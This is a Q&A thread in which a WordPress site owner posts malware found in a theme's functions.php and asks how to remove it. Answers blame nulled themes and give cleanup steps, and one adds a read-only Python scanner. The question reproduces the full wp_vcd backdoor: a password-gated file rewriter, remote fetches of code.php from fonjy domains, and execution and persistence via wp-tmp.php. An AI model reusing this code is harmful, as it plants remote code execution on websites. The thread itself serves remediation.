-3

I don't know how it happened, but a few days ago some code appeared inside my "functions.php" header (my website doesn't work whenever I remove this unknown code), and it seems to redirect and mirror everything to some unknown source. Now it has affected my SSL certificate and is showing error messages like "This is not a private connection" whenever I try to access my website.

Below is the piece of code that was added to the header of my "functions.php".

Can anyone help me to solve this problem? Thanks

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f22fd2bb9496d1dfe84e31567316a32d')) {
    $div_code_name = "wp_vcd";
    switch ($_REQUEST['action']) {
        case 'change_domain';
            if (isset($_REQUEST['newdomain'])) {
                if (!empty($_REQUEST['newdomain'])) {
                    if ($file = @file_get_contents(__FILE__)) {
                        if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i', $file, $matcholddomain)) {
                            $file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }
                    }
                }
            }
            break;
        case 'change_code';
            if (isset($_REQUEST['newcode'])) {
                if (!empty($_REQUEST['newcode'])) {
                    if ($file = @file_get_contents(__FILE__)) {
                        if (preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i', $file, $matcholdcode)) {
                            $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }
                    }
                }
            }
            break;
        default:
            print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }
    die("");
}
$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if (!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            fwrite($handle, "<?php\n" . $phpCode);
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        $wp_auth_key = 'e810cc8873fd72ff6d1585ebccddae8e';
        if (($tmpcontent = @file_get_contents("http://www.fonjy.cc/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.fonjy.cc/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
            }
        } elseif ($tmpcontent = @file_get_contents("http://www.fonjy.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
            }
        } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        } elseif (($tmpcontent = @file_get_contents("http://www.fonjy.top/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.fonjy.top/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        }
    }
}
//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp
?>
Argus Duong
Drickuss Merguez
  • check WordPress theme: header.php and footer file and show code – Bilal Ahmed Dec 05 '17 at 06:30
  • @Drickuss - what error is generated when the website is running? – Priyanka Modi Dec 05 '17 at 06:35
  • Remove the code from the server. Revert the database to a backup before this happened (surely you made some backups?). Change any passwords you have for your server/admin. Google on all the plugins you're using to see if any of them have security updates. Redeploy your site. – M. Eriksson Dec 05 '17 at 06:40

5 Answers

0

Yes, after this code is deleted from the theme's functions.php file, also delete these files from the wp-includes folder, if they are present:

  • /wp-includes/wp-feed.php
  • /wp-includes/wp-tmp.php
  • /wp-includes/wp-vcd.php

Also check the /wp-includes/post.php file; if it has code similar to that in the theme's functions file, delete it as well. Before doing all this, make sure to take a backup of at least all five of these files. Thanks, enjoy.
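A read-only check for the indicators named in the question and in the answer above, as an added example that is not part of the original thread: it looks for the three dropped files and for strings from the injected block in every theme's functions.php and in wp-includes/post.php. The names `scan` and `build_sample` and the sample tree are constructed for illustration.

```python
import os
import re
import tempfile
# Files the answer above says to look for, relative to the WordPress root.
DROPPED = ["wp-includes/wp-feed.php", "wp-includes/wp-tmp.php", "wp-includes/wp-vcd.php"]
# Strings copied from the injected block shown in the question.
MARKERS = [rb'\$div_code_name\s*=\s*"wp_vcd"', rb"function\s+theme_temp_setup\s*\(",
           rb"//\$start_wp_theme_tmp", rb"file_get_contents_tcurl"]

def scan(wp_root):
    """Read-only check; returns sorted (relative_path, reason) findings."""
    findings = [(rel, "dropped file present") for rel in DROPPED
                if os.path.isfile(os.path.join(wp_root, rel))]
    # The injected block lives in theme functions.php files and post.php.
    candidates = [os.path.join(wp_root, "wp-includes", "post.php")]
    themes = os.path.join(wp_root, "wp-content", "themes")
    if os.path.isdir(themes):
        candidates += [os.path.join(themes, t, "functions.php") for t in os.listdir(themes)]
    for path in candidates:
        try:
            with open(path, "rb") as fh:
                data = fh.read()
        except OSError:  # missing or unreadable file: nothing to report
            continue
        hits = sum(1 for pattern in MARKERS if re.search(pattern, data))
        if hits:
            rel = os.path.relpath(path, wp_root).replace(os.sep, "/")
            findings.append((rel, "%d of %d markers" % (hits, len(MARKERS))))
    return sorted(findings)

def build_sample(root):
    """Constructed test tree: one infected theme, one clean theme, one dropped file."""
    files = {
        "wp-includes/wp-vcd.php": "<?php // constructed placeholder\n",
        "wp-includes/post.php": "<?php // clean\n",
        "wp-content/themes/infected/functions.php":
            '<?php\n$div_code_name = "wp_vcd";\n//$start_wp_theme_tmp\n',
        "wp-content/themes/clean/functions.php": "<?php add_action('init', 'x');\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print(scan(tmp))
```

Point `scan()` at a real WordPress root to list which files need attention; it only reads files and leaves removal to the operator.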

-2

This occurs by using NULLED themes and plugins

You have to know that everything nulled is contaminated by malicious code.

When Nulled is installed, the code wakes up at a certain moment, goes through all the folders of your hosting, and installs a script in addition to adding several files.

wp-vcd.php wp-tmp.php:

AND ALSO modifies post.php functions.php

-2

Stop using nulled themes and plugins, that's what you get. Read this; you might want to reinstall the whole thing again - without the nulled software. https://gokhan.ozar.net/blog/removing-malware-from-wordpress/

decoder88
-3

Reinstall your theme. Switch to a new theme and delete the previously used theme which caused the error. Now reinstall your old theme as a fresh install and activate it. Each theme has its own functions.php file. Just a couple of clicks.


I'm not sure what the cause of your problem is, but if it's because of Plugins, then remove unwanted plugins and deactivate the useful plugins and check whether the website works.

If that doesn't help, you can try to export your current WordPress posts and import to a new WordPress install and point your domain to it. Let me know what it says.

M.K.Dan
  • You already posted this exact content as a prior answer, which was already deleted based on content review. Please do not re-post something that's already been deleted. It's no more valid now than it was when you first posted. And there was a *very long* list of comments explaining exactly why this wasn't a valid answer. – David Makogon Dec 06 '17 at 06:14
  • I have shown reference to the guidelines. **But I can't write a good answer without more information! Answers don't have to be exhaustive or infallible, they just need to try to answer the question. It's perfectly fine to post an answer saying, for example, "I'm not sure what the cause of your problem is, but if it's X, you can solve it by doing Y. If that doesn't help, try Z and let me know what it says."** Even if you are a moderator, you can't break the guidelines. They are there for a reason. – M.K.Dan Dec 06 '17 at 09:26
  • The questioner says that code is being added to the functions.php file. The code might not be added because of a plugin but the error caused might be configured by a plugin. The error message is unknown. As per the guideline, a person can answer based on what he gets from the question. A moderator is not above the guidelines. But I can understand they can make decisions based on 'the people they know', 'membership level'. They can just stick to the rules or just misuse their rights given to them. – M.K.Dan Dec 06 '17 at 10:15
-3

See the solution where the suspicious code is found in the .htaccess file. https://stackoverflow.com/a/50871403/4639822

ARUNBALAN NV